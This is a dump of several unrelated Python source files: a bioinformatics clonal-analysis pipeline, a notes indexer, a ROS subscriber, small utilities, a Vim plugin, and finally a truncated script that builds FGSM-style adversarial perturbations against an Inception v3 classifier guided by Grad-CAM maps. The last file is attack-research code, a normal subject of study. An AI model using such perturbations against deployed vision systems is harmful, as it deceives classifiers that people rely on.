sep=\"\\t\", index=False)\n\n if not args.skipTree:\n os.system('Rscript %s/HTGTSrep/R/TREEPlot.R %s %s/external_software/dnapars %d' % \\\n (args.scriptdir, file_collapse, args.scriptdir, args.min_profileread))\n\n # Generate mutation profile of clones using inferred seq as germline seq\n dirprefix = \"%s/%s_clonal\" % (args.outdir, sample)\n if sample != 'allsample':\n # For single sample, the inferred sequence is the root sequence in each clone\n for key, group in records_tree.groupby('CLONE'):\n treefile = \"%s/%s_clonal/lineageTree/%d.txt\" % (args.outdir, sample, key)\n if os.path.exists(treefile):\n inferseq = getInferSeq(treefile, group)\n V_ALLELE = group[\"V_ALLELE\"].unique()[0]\n nuc_stat = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.stat.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_profile = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_PDF = \"%s/nucl_profile_infer/clone%s.%s.%s.%s.%s.pdf\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n profile_DNAmut_clonal(inferseq, group, nuc_stat, nuc_PDF, nuc_profile, args)\n else:\n ''' For all pooled sample\n Folder _profile and _profile_errbar: V gene only profile and with error bar\n Folder _root: tree for each sample, root seq from all sample\n Folder _infer: tree for each sample, root seq from each sample's own seq\n Folder _errbar_infer: the root seq is the root in a clone with all pooled reads\n same as _root, so error bar can be added\n '''\n sample_list = list(args.__dict__['sample_path'].keys())\n short_list = [\"s%d\" % i for i in range(1, len(sample_list)+1)]\n for key, group_clone in records_tree.groupby('CLONE'):\n V_ALLELE = group_clone[\"V_ALLELE\"].unique()[0]\n sample_files = {}\n rootfile = \"%s/allsample_clonal/lineageTree/%d.txt\" % (args.outdir, key)\n if not os.path.exists(rootfile): continue\n rootseq = getInferSeq(rootfile, group_clone)\n\n for i in range(0, len(sample_list)):\n sample = sample_list[i]\n short = short_list[i]\n\n group = group_clone[group_clone['SAMPLE']==sample]\n if len(group) < args.min_profileread_sub: continue\n\n root_stat = \"%s/nucl_text_root/clone%s.%s.%s.%s.%s.stat.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n root_profile = \"%s/nucl_text_root/clone%s.%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n root_PDF = \"%s/nucl_profile_root/clone%s.%s.%s.%s.%s.pdf\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n profile_DNAmut_clonal(rootseq, group, root_stat, root_PDF, root_profile, args)\n sample_files[sample] = [root_PDF, root_stat]\n\n treefile = \"%s/allsample_clonal/lineageTree/%d.%s.txt\" % (args.outdir, key, short)\n if not os.path.exists(treefile): continue\n inferseq = getInferSeq(treefile, group)\n\n nuc_stat = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.stat.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_profile = \"%s/nucl_text_infer/clone%s.%s.%s.%s.%s.nuc.txt\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n nuc_PDF = \"%s/nucl_profile_infer/clone%s.%s.%s.%s.%s.pdf\" % (\n dirprefix, key, V_ALLELE, sample, args.muttype, args.productivetype)\n profile_DNAmut_clonal(inferseq, group, nuc_stat, nuc_PDF, nuc_profile, args)\n\n # Run for the profile with error bar\n nuc_PDF_errbar = \"%s/nucl_profile_errbar_infer/clone%s.%s.%s.%s.errbar.pdf\" % (\n dirprefix, key, V_ALLELE, args.muttype, args.productivetype)\n nuc_stat_errbar = \"%s/nucl_text_errbar_infer/clone%s.%s.%s.%s.stat.errbar.txt\" % (\n dirprefix, key, V_ALLELE, args.muttype, args.productivetype)\n if len(sample_files) > 1:\n profile_DNAmut_clonal_errbar(rootseq, group_clone, nuc_stat_errbar, \\\n nuc_PDF_errbar, sample_files, args)\n\ndef series_analyze_onesample(records, sample, args):\n \"\"\"\n A series of analysis for each clone, including:\n 1. Define clones\n 2. DNA mutation profile\n 3. Amino Acid profile\n 4. Summarize clones\n 5. Lineage Tree construction\n \"\"\"\n ### 09162020 Lawrence: added print(...)\n # show the current sample\n print(\"current sample:\", sample, file=sys.stderr)\n # Define clones and write IgBlast Db files\n records = define_clones(records, args)\n outputfile = '%s/%s_clonal/%s.db_clone.xls' % (args.outdir, sample, sample)\n write_cloneDb(records, outputfile, args)\n\n # Generate mutation profile\n if not args.skipTree:\n Tree_clones(records, sample, args)\n\n # Generate AA profile\n for key, group in records.groupby('CLONE'):\n if len(group) >= args.min_profileread:\n DNAprofile_clones(group, sample, args, 'sepCluster')\n AAprofile_clones(group, sample, args)\n\n statfile = '%s/%s_clonal/%s.clone_stat.xls' % (args.outdir, sample, sample)\n clone_stat(records, statfile, 'sep', args)\n return records\n'''\n ###ADD CONSENSUS/AA DETAILS HERE!##################################################\n tempFile = '%s/%s_clonal/%s.clone_stat_temp.xls' % (args.outdir, sample, sample)\n scriptLocation = '%s/HTGTSrep/translate_consensus_Clonal.py' % (args.scriptdir) #may need to add %s/HTGTSrep/translate_consensus_clonal\n os.system(\"python3 {0} {1} > {2}\".format(scriptLocation, statfile, tempFile))\n os.system(\"mv {0} {1}\".format(tempFile, statfile))\n \n ###################################################################################\n'''\n\n\n# def selection_analyze():\n# os.system('Rscript %s/external_software/baseline/Baseline_Main_Version1.3.r' \\\n# '1 2 1 1 0 0 1:26:38:55:65:104 sample.fasta testfold test' % ())\n\ndef diversity_analyze(outputfile, args):\n '''\n Run Diversity.R to analyze diversity and abundance, required alakazam R package\n '''\n if not args.skipDiversity:\n os.system('Rscript %s/HTGTSrep/R/Diversity.R %s %s/allsample_clonal/allsample' % (\n args.scriptdir, outputfile, args.outdir))\n\ndef clone_stat(records, statfile, sampletype, args):\n '''\n Statistically summarize the reads in diff clones\n sampletype:\n mix: clones clustered of all sample reads\n sep: clones clustered of single sample reads\n '''\n statcols = ['CLONE', 'SAMPLE_NUM', 'READ_NUM', 'SAMPLE_DETAIL', 'SAMPLE_RATIO',\n 'V_ALLELE', 'D_ALLELE', 'J_ALLELE', 'JUNC_LEN', 'JUNC_NUM', 'JUNC_DETAIL']\n statDf = pd.DataFrame(columns=statcols)\n grouped = records.groupby('CLONE')\n for key, group in grouped:\n CLONE = group['CLONE'].values[0]\n SAMPLE_NUM = len(group['SAMPLE'].unique())\n READ_NUM = len(group)\n\n if sampletype == 'mix':\n sc = group['SAMPLE'].value_counts()\n SAMPLE_DETAIL = '|'.join(['%s:%d' % (sample, sc.get(sample, 0)) \\\n for sample in args.__dict__['sample_path']])\n SAMPLE_RATIO = '|'.join(['%s:%.4f' % (sample, float(sc.get(sample, 0))/len(records[records['SAMPLE']==sample])) \\\n for sample in args.__dict__['sample_path']])\n else:\n SAMPLE_DETAIL = group['SAMPLE'].values[0]\n SAMPLE_RATIO = 1\n V_ALLELE = group[\"V_ALLELE\"].value_counts().keys()[0]\n D_ALLELE = group[\"D_ALLELE\"].value_counts().keys()[0]\n J_ALLELE = group[\"J_ALLELE\"].values[0]\n JUNC_LEN = len(group['CDR3_SEQ'].values[0])\n JUNC_NUM = len(group['CDR3_SEQ'].unique())\n\n junc_count = group['CDR3_SEQ'].value_counts()\n JUNC_DETAIL = '|'.join(['%s:%d' % (junc, junc_count[junc]) \\\n for junc in group['CDR3_SEQ'].unique()])\n\n statDf.loc[len(statDf)+1] = [CLONE, SAMPLE_NUM, READ_NUM, SAMPLE_DETAIL, SAMPLE_RATIO,\n V_ALLELE, D_ALLELE, J_ALLELE, JUNC_LEN, JUNC_NUM, JUNC_DETAIL]\n\n if sampletype == 'sep': statDf.drop('SAMPLE_RATIO', inplace=True, axis=1)\n statDf.to_csv(statfile, sep=\"\\t\", index=False)\n\ndef series_analyze_allsample(records, samplelist, args):\n ''' Series analyze of pooled samples\n '''\n records.CLONE = records.SAMPLE + '.' + records.CLONE.map(str)\n outputfile = '%s/allsample_clonal/allsample.sep_clone.xls' % (args.outdir)\n records.to_csv(outputfile, sep=\"\\t\", index=False)\n\n # Do diversity/abundance analysis using clones clustered within each sample\n diversity_analyze(outputfile, args)\n\n # Do clonal clustering of all sample reads\n records.drop('CLONE', inplace=True, axis=1)\n records = define_clones(records, args)\n outputfile = '%s/allsample_clonal/allsample.mix_clone.xls' % (args.outdir)\n records.to_csv(outputfile, sep=\"\\t\", index=False)\n \n # Generate mutation profile for each sample\n for key, group in records.groupby('CLONE'):\n sample_errbar = []\n # key is each clone\n # group is df\n for sample, subgroup in group.groupby('SAMPLE'):\n ### args.min_profileread_sub = 10\n if len(subgroup) >= args.min_profileread_sub:\n sample_errbar.append(sample)\n DNAprofile_clones(subgroup, sample, args, 'mixCluster')\n if len(group) >= args.min_profileread:\n # Gen all sample profile & with err bar\n DNAprofile_clones(group, \"allsample\", args, 'mixCluster')\n AAprofile_clones(group, \"allsample\", args)\n if len(sample_errbar) > 1:\n DNAprofile_clones_errbar(group, sample_errbar, args)\n\n statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)\n clone_stat(records, statfile, 'mix', args)\n #########CREATE MASTER TLX HERE ################\n masterstatfile = '%s/allsample_clonal/allsample.master.mix_clone.stat.xls' % (args.outdir)\n #tempFile = '%s/%s_clonal/%s.clone_stat_temp.xls' % (args.outdir, sample, sample)#\n listSamples = \"\"\n for sample in samplelist:\n clonestatfile = '%s/%s_clonal/%s.clone_stat.xls' % (args.outdir, sample, sample)\n listSamples += clonestatfile + \" \"\n print(\"samplelist=\",samplelist, file = sys.stderr)\n\n ##create master xls\n scriptLocation = '%s/HTGTSrep/junctionsPerLibs.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} {2} > {3}\".format(scriptLocation, statfile, listSamples, masterstatfile)) ###junctionsperlibs\n \n ###create lib detail file\n libdetailfile = '%s/allsample_clonal/allsample.lib_detail.xls' % (args.outdir)\n libScript = '%s/HTGTSrep/libConsensus_clonal.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} > {2}\".format(libScript, masterstatfile, libdetailfile))\n \n ###order information in master file\n tempMaster = '%s/allsample_clonal/allsample.master_temp.mix_clone.stat.xls' % (args.outdir)\n orderlibScript = '%s/HTGTSrep/orderLibDetail.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} > {2}\".format(orderlibScript, masterstatfile, tempMaster))\n os.system(\"mv {0} {1}\".format(tempMaster, masterstatfile))\n \n ###add sample ration and sort 6/11\n addRatioScript = '%s/HTGTSrep/add_sampleratio_sort.py' % (args.scriptdir)\n os.system(\"python3 {0} {1} {2}\".format(addRatioScript, statfile, listSamples))\n #print(\"COMMAND: python3 \"+addRatioScript+\" \"+statfile+\" \"+listSamples)\n \n ##Screen 6/11\n screenScript = '%s/HTGTSrep/screen_master_stat.py' % (args.scriptdir)\n screenoutputfile = '%s/allsample_clonal/%s.master.mix_clone.stat_screen.xls' % (args.outdir, args.outdir)\n os.system(\"python3 {0} {1} > {2}\".format(screenScript, masterstatfile, screenoutputfile))\n \n \n ###clean up files\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.master.mix_clone.stat.xls' % (args.outdir), '%s/allsample_clonal/%s.master.mix_clone.stat.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.lib_detail.xls' % (args.outdir), '%s/allsample_clonal/%s.lib_detail.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir), '%s/allsample_clonal/%s.mix_clone.stat.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.mix_clone.xls' % (args.outdir), '%s/allsample_clonal/%s.mix_clone.xls' % (args.outdir, args.outdir)))\n os.system(\"mv {0} {1}\".format('%s/allsample_clonal/allsample.sep_clone.xls' % (args.outdir), '%s/allsample_clonal/%s.sep_clone.xls' % (args.outdir, args.outdir)))\n\n\n # Generate stat file for shared clones\n ### TEHSE HAbr BEEN GENERATED ABOVE SO THESE TWO LINES ARE COMMENTED OUT\n # statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)\n # clone_stat(records, statfile, 'mix', args)\n\n # Generate lineage Tree\n if not args.skipTree:\n Tree_clones(records, 'allsample', args, sample_errbar)\n\ndef clonal_main(args):\n logging.info('Loading reads database')\n # Collapse reads\n sample_path = args.__dict__['sample_path']\n pool = multiprocessing.Pool(processes = len(sample_path))\n results = []\n for sample in sample_path:\n path = sample_path[sample]\n dbpath = path + '/%s.db.xls' % sample\n records = pd.read_csv(dbpath, sep=\"\\t\")\n print(\"initial records file\", dbpath, file=sys.stderr)\n # Filter records using V coverage, CDR3 length, whether 'N' in CDR3\n records = records.loc[records['V_COVERAGE'] > args.min_Vcov, ]\n records[\"JUNCTION_LENGTH\"] = records.CDR3_SEQ.map(len)\n records = records.loc[records['JUNCTION_LENGTH'] > 1, ]\n records = records.loc[records['SEQUENCE_IMGT'] != '-', ]\n\n records['SAMPLE'] = sample\n records['CDR3_MASK'] = [re.sub('[\\.-]', 'N', seq) for seq in records.CDR3_SEQ]\n\n if args.skipCDR3withN:\n records = records[~records['CDR3_MASK'].str.contains(\"N\")]\n\n if args.muttype == 'MutOnly':\n records = records.loc[records['V_MUTATION'] > 0, ]\n elif args.muttype == 'noMut':\n records = records.loc[records['V_MUTATION'] == 0, ]\n if args.productivetype == 'P':\n records = records.loc[records['PRODUCTIVE'] == 'T', ]\n elif args.productivetype == 'NP':\n records = records.loc[records['PRODUCTIVE'] == 'F', ]\n # Run series analysis with multiprocessing result = series_analyze_onesample(records, sample, args)\n # print(\"mid loop: sample is\", sample, file=sys.stderr)\n result = pool.apply_async(series_analyze_onesample, (records, sample, args,))\n # print(\"result.get()\",result.get(),file=sys.stderr)\n results.append(result)\n pool.close()\n pool.join()\n\n # Analysis in all samples\n #print(\"frame: results=\",results, file = sys.stderr)\n ### frame: results= [<multiprocessing.pool.ApplyResult object at 0x7fe95d9d13d0>, ....,]\n frames = [result.get() for result in results]\n records_allsample = pd.concat(frames, ignore_index=True)\n series_analyze_allsample(records_allsample, sample_path.keys(), args)\n","sub_path":"HTGTSrep/HTGTSrep/clonal.py","file_name":"clonal.py","file_ext":"py","file_size_in_byte":26740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"585383700","text":"#coding=utf-8\n\n#Created by Alfred Jiang 20150514\n\n\nimport sys\nimport os\nimport json\n\niosnotebook_project_url = \"https://github.com/viktyz/iosnotebook/blob/master/\"\n\nlist = []\n\n#获取脚本文件的当前路径\ndef current_file_dir():\n\n path = sys.path[0]\n\n if os.path.isdir(path):\n\n return path\n\n elif os.path.isfile(path):\n\n return os.path.dirname(path)\n\ndef parse_file(filepath, filename):\n\n url_string = iosnotebook_project_url\n\n if str(filename).startswith('Note_'):\n\n url_string = url_string + 'Notes/' + filename\n\n elif str(filename).startswith('JavaScript_'):\n\n url_string = url_string + 'JavaScript/' + filename\n\n elif str(filename).startswith('Python_'):\n\n url_string = url_string + 'Python/' + filename\n\n else:\n\n return\n\n\n file = open(filepath + '/' + filename, 'r')\n\n is_name_section = False\n is_tag_section = False\n is_session_section = False\n\n name_string = ''\n tag_string = ''\n session_string = ''\n\n for linenum, line in enumerate(file.readlines()):\n\n if len(str(line).strip('\\n')) == 0:\n\n continue\n\n if '### 方案名称' in line:\n\n is_name_section = True\n is_tag_section = False\n is_session_section = False\n\n continue\n\n if '### 关键字' in line:\n\n is_name_section = False\n is_tag_section = True\n is_session_section = False\n\n continue\n\n if '### 需求场景' in line:\n\n is_name_section = False\n is_tag_section = False\n is_session_section = True\n\n continue\n\n if '### 参考链接' in line:\n\n is_name_section = False\n is_tag_section = False\n is_session_section = False\n\n break\n\n if is_name_section == True and len(str(line).strip('\\n')) != 0 :\n\n name_string = name_string + str(line).strip('\\n')\n\n if is_tag_section == True and len(str(line).strip('\\n')) != 0:\n\n tag_string = tag_string + str(line).strip('\\n')\n\n if is_session_section == True and len(str(line).strip('\\n')) != 0:\n\n session_string = session_string + str(line).strip('\\n')\n\n info = dict()\n\n info['title'] = name_string\n info['category'] = session_string\n info['tags'] = tag_string\n info['url'] = url_string\n info['date'] = ''\n\n list.append(info)\n\ndef get_file_from_dir(dir,callback):\n\n for root,dirs,files in os.walk(dir):\n\n for item in files:\n\n extension = os.path.splitext(item)[1][1:]\n\n callback(root, item)\n\n# 主函数\ndef main():\n\n get_file_from_dir(current_file_dir(), parse_file)\n\n json.dump(list, open(r'Other/search.json', 'w'),ensure_ascii=False, indent=1)\n\nif __name__ == '__main__':\n main()","sub_path":"md_to_search_json.py","file_name":"md_to_search_json.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"102907493","text":"#!/usr/bin/env python\nimport rospy\n\nimport geometry_msgs\nimport std_msgs\nimport numpy as np\nimport message_filters\nfrom learning_tf.msg import Network\nfrom std_msgs.msg import Int16MultiArray\nfrom std_msgs.msg import Int16\nfrom geometry_msgs.msg import PoseStamped\nfrom tf.transformations import euler_from_quaternion\nfrom message_filters import TimeSynchronizer, Subscriber\n\nglobal txrx_pl\nglobal txrx_td\nglobal roll\nglobal pitch\nglobal yaw\nglobal x\nglobal y\nglobal z\nglobal linear_vel\nglobal angular_vel\n\ndef gotimage(txrx, pose):\n print(\"Attempting to synch\")\n print(\"success\")\n txrx_pl = txrx.packet_loss\n txrx_td = txrx.time_delay\n x = pose.pose.position.x\n y = pose.pose.position.y\n z = pose.pose.position.z\n quaternion = (\n pose.pose.orientation.x,\n pose.pose.orientation.y,\n pose.pose.orientation.z,\n pose.pose.orientation.w)\n euler = euler_from_quaternion(quaternion)\n roll = euler[0]\n pitch = euler[1]\n yaw = euler[2]\n\n print(\"Packet Loss: %s, Time Delay: %s, Roll: %s, Pitch: %s, Yaw: %s\" % (txrx_pl, txrx_td, roll, pitch, yaw))\n\nrospy.init_node('GetData', anonymous=True)\nnetwork_sub = message_filters.Subscriber(\"/network_stats\", Network)\npose_sub = message_filters.Subscriber(\"/lilbot_3BA615/pose_152\", PoseStamped)\n#image_sub = Subscriber(\"/wide_stereo/left/image_rect_color\", sensor_msgs.msg.Image)\n#camera_sub = Subscriber(\"/wide_stereo/left/camera_info\", sensor_msgs.msg.CameraInfo)\n\nats = TimeSynchronizer([network_sub, pose_sub], 10)\nats.registerCallback(gotimage)\nrospy.spin()\n","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"299794325","text":"def coverPoints(A, B):\n steps = 0\n for i in range(1, len(A)):\n steps += max(abs(A[i] - A[i - 1]), abs(B[i] - B[i - 1]))\n return steps\n\n\ndef main():\n steps = coverPoints([1, 2, 3, 4], [3, 5, 7, 1])\n print(\"Minimum no of steps taken to cover the points in 2d grid\", steps)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"min_steps_infinite_grid.py","file_name":"min_steps_infinite_grid.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"333293431","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom bonaparticle import core\nfrom bonaparticle.tasks import task, images\nfrom sys import argv\nfrom os.path import isfile\n\n\n\n\nDEFAULT_MASTER_FILE = 'Master.tex'\n\n\n# Create a new BonapartechnicalEditor instance\neditor = core.BonapartechnicalEditor()\n\n# Assign a simple image conversion task to our newly created editor\neditor.assign_task(images.NaiveCompressionTask())\n\n\nif len(argv) > 1:\n file_name = argv[1]\n if isfile(file_name):\n editor.process(file_name)\n else:\n editor.error(\"\\n\" + file_name + \" doesn't exist\")\nelse:\n if isfile(DEFAULT_MASTER_FILE):\n editor.process(DEFAULT_MASTER_FILE)\n else:\n editor.error(\n \"\\nPlease supply \" + DEFAULT_MASTER_FILE + \" or another file name\"\n )\n","sub_path":"bin/bonaparticle.py","file_name":"bonaparticle.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"39143026","text":"#\n# Copyright (C) 2009 Benoit Pierre <benoit.pierre@gmail.com>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n\n\nfrom bzrstatus.complete import Complete\nfrom bzrstatus.output import Output\nfrom bzrstatus.ui import UI\n\nfrom StringIO import StringIO\n\nfrom bzrlib import commands, trace, ui, osutils, version_info\nfrom bzrlib.errors import (BzrError, NoWorkingTree)\nfrom bzrlib.workingtree import WorkingTree\n\nimport traceback\nimport shlex\nimport vim\nimport sys\nimport os\n\n\nvim_stdout = sys.stdout\nvim_stderr = sys.stderr\nuser_encoding = osutils.get_user_encoding()\n\n\nbzr_instances = {}\n\n\nclass Bzr:\n\n def __init__(self, path):\n\n if '/' == path[-1]:\n self.path = path[0:-1]\n else:\n self.path = path\n\n self.update()\n\n vim.command(\"let t:bzr_id='\" + str(id(self)) + \"'\")\n bzr_instances[id(self)] = self\n vim.command(\"let t:bzr_num=\" + str(len(bzr_instances)))\n\n def complete(self, cmdline, cursorpos):\n\n try:\n matches = Complete(cmdline, cursorpos, self.root).complete()\n except ValueError:\n matches = []\n e = sys.exc_info()[1]\n print >> sys.stderr, 'parse error:', e.message\n\n vim.command(\"let matches = ['\" + \"', '\".join(matches) + \"']\")\n\n def run(self, cmd, to_buffer=True, progress_updates=False):\n\n if type(cmd) is str:\n argv = shlex.split(cmd)\n else:\n argv = cmd\n\n if to_buffer:\n output = Output(progress_updates,\n vim.current.buffer,\n vim.current.window)\n else:\n output = StringIO()\n\n olddir = os.getcwd()\n os.chdir(self.root)\n\n try:\n sys.stdout = output\n sys.stderr = output\n\n trace.enable_default_logging()\n ui.ui_factory = UI(output)\n\n # Is this a final release version? If so, we should suppress warnings\n if version_info[3] == 'final':\n from bzrlib import symbol_versioning\n symbol_versioning.suppress_deprecation_warnings(override=False)\n\n new_argv = []\n try:\n # ensure all arguments are unicode strings\n for arg in argv:\n if isinstance(arg, unicode):\n new_argv.append(arg)\n else:\n new_argv.append(arg.decode(user_encoding))\n except UnicodeDecodeError:\n raise BzrError(\"argv should be list of unicode strings.\")\n argv = new_argv\n\n try:\n ret = commands.run_bzr_catch_errors(argv)\n except:\n print >>vim_stderr, StringIO(traceback.format_exc())\n ret = -1\n\n ui.ui_factory.finish()\n\n if not to_buffer:\n return output.getvalue()\n\n output.flush(redraw=False, final=True)\n\n vim.command(\"let b:bzrstatus_fileformat = '%s'\" %\n (output.fileformat))\n\n return ret\n\n finally:\n\n for handler in trace._bzr_logger.handlers:\n handler.close()\n if trace._trace_file is not None:\n trace._trace_file.close()\n trace._trace_file = None\n\n os.chdir(olddir)\n\n sys.stdout = vim_stdout\n sys.stderr = vim_stderr\n\n def update(self, update_file=False):\n\n self.tree = None\n self.root = self.path\n\n try:\n self.tree = WorkingTree.open_containing(self.path)[0]\n self.root = self.tree.basedir\n except NoWorkingTree:\n pass\n\n if update_file:\n self.update_file()\n\n def update_file(self):\n filename = '[BZR' + str(vim.eval('t:bzr_num')) + '] ' + self.root\n if self.tree is not None:\n filename += ' [' + self.tree.branch.nick + ']'\n vim.command(\"exe 'file '.fnameescape('\" + filename + \"')\")\n\n\ndef bzr():\n return bzr_instances[int(vim.eval('t:bzr_id'))]\n\n\n","sub_path":"lib/python/bzrstatus/bzr.py","file_name":"bzr.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157854636","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport tensorflow.contrib.slim.nets as nets\nfrom urllib.request import urlretrieve\nimport json\nimport matplotlib.pyplot as plt\nimport PIL\nimport numpy as np\nstep=16\nresult_file=str(step)+'_FGSM_attack.txt'\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]='3'\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.InteractiveSession(config=config)\ny_hat = tf.placeholder(tf.int64, ())\nlabels = tf.one_hot(y_hat, 1000)\n\nx = tf.placeholder(tf.float32, (1, 299, 299, 3))\nx_rar = tf.placeholder(tf.float32, (1, 299, 299, 3))\nx_adv = tf.Variable(tf.zeros([1, 299, 299, 3]))\n\n_POOL_NAME = 'Mixed_7c'\n_POOL_SIZE = 8\n_MODEL_END = 'Logits'\n\n\ndef inception(image, reuse):\n preprocessed = tf.multiply(tf.subtract(image, 0.5), 2.0)\n arg_scope = nets.inception.inception_v3_arg_scope(weight_decay=0.0)\n with slim.arg_scope(arg_scope):\n logits, end_point = nets.inception.inception_v3(preprocessed, 1001, is_training=False, reuse=reuse)\n logits = logits[:, 1:] # ignore background class\n probs = tf.nn.softmax(logits) # probabilities\n return logits, probs, end_point\n\n\ndef grad_cam(end_point, pre_calss_one_hot):\n conv_layer = end_point[_POOL_NAME]\n signal = tf.multiply(end_point[_MODEL_END][:, 1:], pre_calss_one_hot)\n loss = tf.reduce_mean(signal, 1)\n grads = tf.gradients(loss, conv_layer)[0]\n norm_grads = tf.div(grads, tf.sqrt(tf.reduce_mean(tf.square(grads))) + tf.constant(1e-5))\n weights = tf.reduce_mean(norm_grads, axis=(1, 2))\n weights = tf.expand_dims(weights, 1)\n weights = tf.expand_dims(weights, 1)\n weights = tf.tile(weights, [1, _POOL_SIZE, _POOL_SIZE, 1])\n pre_cam = tf.multiply(weights, conv_layer)\n cam = tf.reduce_sum(pre_cam, 3)\n cam = tf.expand_dims(cam, 3)\n cam = tf.nn.relu(cam)\n resize_cam = tf.image.resize_images(cam, [299, 299])\n resize_cam = resize_cam / tf.reduce_max(resize_cam)\n return resize_cam\n\n\ndef cal_IOU(rar_map, adv_map):\n clip_rar = tf.sign(tf.nn.relu(rar_map - tf.reduce_max(rar_map) * 0.5))\n clip_adv = tf.sign(tf.nn.relu(adv_map - tf.reduce_max(rar_map) * 0.5))\n\n tt_tmp = clip_rar + clip_adv\n total_clip = tf.sign(tt_tmp)\n\n b_tmp = tf.nn.relu(clip_rar + clip_adv - 1)\n bing_clip = tf.sign(b_tmp)\n\n iou = tf.reduce_sum(bing_clip, [1, 2, 3]) / tf.reduce_sum(total_clip, [1, 2, 3])\n return iou\n\n\ndef g_loss(rar_map, adv_map):\n grad_cam_loss = tf.reduce_sum(tf.pow(rar_map - adv_map, 2))\n return grad_cam_loss\n\n\ndef sign_gloss(rar_map, adv_map):\n clip_rar = tf.sign(tf.nn.relu(rar_map - tf.reduce_max(rar_map) * 0.2))\n clip_rar = tf.reshape(clip_rar, [-1, 299 * 299])\n flatten_rar_amp = tf.reshape(rar_map, [-1, 299 * 299])\n flatten_adv_map = tf.reshape(adv_map, [-1, 299 * 299])\n\n gloss = tf.reduce_mean(tf.abs(clip_rar - flatten_adv_map))\n\n # closs\n ARGMAX = tf.argmax(probs, 1)\n MA = tf.one_hot(ARGMAX, 1000)\n closs = -tf.losses.softmax_cross_entropy(MA, adv_logits)\n return closs\n # return - 10 * gloss\n\n\nlogits, probs, end_point = inception(x, reuse=tf.AUTO_REUSE)\nrar_logits, rar_probs, rar_end_point = inception(x_rar, reuse=tf.AUTO_REUSE)\nadv_logits, adv_probs, adv_end_point = inception(x_adv, reuse=tf.AUTO_REUSE)\n_correct = tf.equal(tf.argmax(rar_probs, 1), (tf.argmax(adv_probs, 1)))\nrestore_vars = [\n var for var in tf.global_variables()\n if var.name.startswith('InceptionV3/')\n]\nsaver = tf.train.Saver(restore_vars)\nsaver.restore(sess, \"../model/inception_v3.ckpt\")\n\nimagenet_json=('../dataset/imagenet.json')\nwith open(imagenet_json) as f:\n imagenet_labels = json.load(f)\n\n\ndef classify(img, correct_class=None, target_class=None):\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(10, 8))\n fig.sca(ax1)\n p = sess.run(rar_probs, feed_dict={x_rar: img})[0]\n ax1.imshow(img)\n fig.sca(ax1)\n\n topk = list(p.argsort()[-10:][::-1])\n topprobs = p[topk]\n barlist = ax2.bar(range(10), topprobs)\n if target_class in topk:\n barlist[topk.index(target_class)].set_color('r')\n if correct_class in topk:\n barlist[topk.index(correct_class)].set_color('g')\n plt.sca(ax2)\n plt.ylim([0, 1.1])\n plt.xticks(range(10),\n [imagenet_labels[i][:15] for i in topk],\n rotation='vertical')\n fig.subplots_adjust(bottom=0.2)\n plt.show()\n\n\ndef load(img_path):\n img = PIL.Image.open(img_path).convert('RGB')\n big_dim = max(img.width, img.height)\n wide = img.width > img.height\n new_w = 299 if not wide else int(img.width * 299 / img.height)\n new_h = 299 if wide else int(img.height * 299 / img.width)\n img = img.resize((new_w, new_h)).crop((0, 0, 299, 299))\n img = (np.asarray(img) / 255.0).astype(np.float32)\n return img\n\n\nrar_grad_cam = grad_cam(rar_end_point, labels)\nadv_grad_cam = grad_cam(adv_end_point, labels)\n\nget_random = tf.sign(tf.random_normal([299, 299, 3])) * 8 / 255\n\nget_iou_op = 